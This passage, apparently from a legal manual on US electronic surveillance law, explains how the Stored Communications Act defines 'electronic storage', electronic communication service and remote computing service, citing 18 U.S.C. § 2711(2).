Cover art courtesy of Greg Kipper.
[…] The two concepts are coextensive. Only a provider
that holds a communication in “electronic storage” can provide ECS with
respect to that communication. Conversely, any stored file held by a provider
of ECS must be in “electronic storage.” If a communication is not in “electronic
storage,” the service cannot provide ECS for that communication. Instead, the
service must provide either “remote computing service” (also known as
“RCS,”discussed below), or else neither ECS nor RCS. See discussion infra.
“Remote computing service”
The term “remote computing service” (“RCS”) is defined by 18 U.S.C.
§ 2711(2) as “provision to the public of computer storage or processing services
by means of an electronic communications system.” An “electronic communi-
cations system” is “any wire, radio, electromagnetic, photooptical or photo-
electronic facilities for the transmission of electronic communications, and any
computer facilities or related electronic equipment for the electronic storage